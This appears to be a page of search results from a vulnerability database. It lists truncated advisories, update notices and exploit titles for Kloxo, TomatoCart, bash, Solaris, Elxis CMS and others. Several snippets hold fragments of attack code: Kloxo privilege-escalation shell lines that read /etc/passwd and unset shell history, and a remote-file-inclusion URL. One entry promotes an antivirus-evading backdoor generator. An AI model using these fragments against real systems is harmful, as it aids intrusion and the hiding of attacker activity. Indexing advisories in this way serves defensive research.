341 matches found
[SECURITY] Fedora 18 Update: nodejs-cmd-shim-1.1.0-3.fc18
The cmd-shim used in npm to create executable scripts on Windows, since symlinks are not suitable for this purpose there. On Unix systems, you should use a symbolic link instead, but this module supports creating shell script shims also...
Design/Logic Flaw
The Key Management feature in the SecureSphere Operations Manager (SOM) Management Server in Imperva SecureSphere 9.0.0.5 allows remote authenticated users to upload executable files via the (1) privatekey or (2) publickey parameter in a T/keyManagement request to plain/settings.html, as demonstrated b...
Solaris 10 Patch Cluster File Clobber
File clobbering vulnerability in Solaris 10 patch cluster 3/27/2013 Larry W. Cashdollar @larry0 Hello, The 147147-26 patch creates a CLEANUP file in /tmp that is vulnerable to symlink attacks: The contents of the file created in /tmp are: /sbin/sh:root@dev-unix-sec02 cat CLEANUP...
Kloxo 6.1.6 - Local Privilege Escalation
Exploit for linux platform in category local exploits LXLABS=cat /etc/passwd | grep lxlabs | cut -d: -f3 export MUID=$LXLABS export GID=$LXLABS export TARGET=/bin/sh export CHECKGID=0 export NONRESIDENT=1 echo "unset HISTFILE HISTSAVE PROMPTCOMMAND TMOUT" /tmp/w00trc echo "/usr/sbin/lxrestart...
TomatoCart 1.x Unrestricted File Creation
TomatoCart 1.x versions are susceptible to an unrestricted file creation vulnerability. 1. OVERVIEW TomatoCart 1.x versions are vulnerable to Unrestricted File Creation. 2. BACKGROUND TomatoCart is an innovative Open Source shopping cart solution developed by Wuxi Elootec Technology Co., Ltd. It ...
TomatoCart - json.php Security Bypass
TomatoCart - json.php Security Bypass source: https://www.securityfocus.com/bid/57156/info TomatoCart is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and create files with arbitrary shell script which may aid in further...
TomatoCart - 'json.php' Security Bypass
source: https://www.securityfocus.com/bid/57156/info TomatoCart is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and create files with arbitrary shell script which may aid in further attacks. TomatoCart versions 1.1.5 and 1.1....
Ubuntu Update for apport USN-1668-1
Ubuntu Update for Linux kernel vulnerabilities USN-1668-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN16681.nasl 7960 2017-12-01 06:58:16Z santu $ Ubuntu Update for apport USN-1668-1 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This...
USN-1668-1: Apport update
Dan Rosenberg discovered that an application running under an AppArmor profile that allowed unconfined execution of apport-bug could escape confinement by calling apport-bug with a crafted environment. While not a vulnerability in apport itself, this update mitigates the issue by sanitizing certa...
Mandrake Linux Security Advisory : man (MDKSA-2000:015)
Internet Security Systems (ISS) X-Force has identified a vulnerability in the makewhatis Bourne shell script that ships with many Linux distributions. It is found in versions 1.5e and higher of man, and handles temporary files insecurely. Local users may gain a variety of privileges depending on th...
Scientific Linux Security Update : bash on SL5.x i386/x86_64
Bash is the default shell for Scientific Linux. It was found that certain scripts bundled with the Bash documentation created temporary files in an insecure way. A malicious, local user could use this flaw to conduct a symbolic link attack, allowing them to overwrite the contents of arbitrary fil...
CentOS Update for bash CESA-2011:1073 centos5 x86_64
Check for the Version of bash OpenVAS Vulnerability Test CentOS Update for bash CESA-2011:1073 centos5 x86_64 Authors: System Generated Check Copyright: Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under...
AZ Photo Album Script Cross Site Scripting
Exploit Title: AZ Photo Album Script Multiple Vulnerability Date: 2012 Author: Eyup CELIK Version: All Version Tested on: All versions are Vulnerability Web Site: www.eyupcelik.com.tr ISSUE XSS can be done using the command input and shell script upload Vulnerable Page: index.php File Upload - XS...
Fully Undetectable Backdoor generator for Metasploit
Security Labs experts from India launch an automated anti-virus and firewall bypass script. It's a modified and stable version made to work with the Backtrack 5 distro. Below you can find the modified version and a simple presentation on how i...
Linux Kernel 2.6.22 Local root Exploit
Exploit for linux platform in category local exploits #!/bin/sh Linux Kernel 2.6.22 Local root Exploit ...
bash: Insecure temporary file use in aliasconv.sh, aliasconv.bash, cshtobash (symlink attack)
bash-doc 3.2 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/cb.? temporary file, related to the (1) aliasconv.sh, (2) aliasconv.bash, and (3) cshtobash scripts...
Sun Microsystems SunScreen Firewall - Privilege Escalation
Sun Microsystems SunScreen Firewall - Privilege Escalation / Sun Microsystems SunScreen Firewall Root Exploit discovered & exploited by Kingcope January 2011 The SunScreen Firewall can be administrated remotely via a java protocol service which is running on port 3858 on a SunOS machine. This Jav...
aidSQL: A Tool to Find Vulnerable Spots in Web Sites !
aidSQL is a PHP application provided for detecting security holes in your websites. It is a modular application, meaning that you can develop your very own plugins for SQL injection detection & exploitation. Sample usage of aidsql: ./aidSQL --url=www.sample123.com We find it similar to nikto,...
Elxis CMS 2009.2 - Remote File Inclusion
installation folder.'; include$mosConfigabsolutepath.'/includes/systemplates/router.php'; exit; requireonce$mosConfigabsolutepath.'/includes/Core/loader.php'; file : index2.php http://site.com/elxis-cms/index2.php?mosConfigabsolutepath=sh...
YACK CMS 10.5.27 Remote File Inclusion Vulnerability
YACK CMS 10.5.27 Remote File Inclusion Vulnerability ...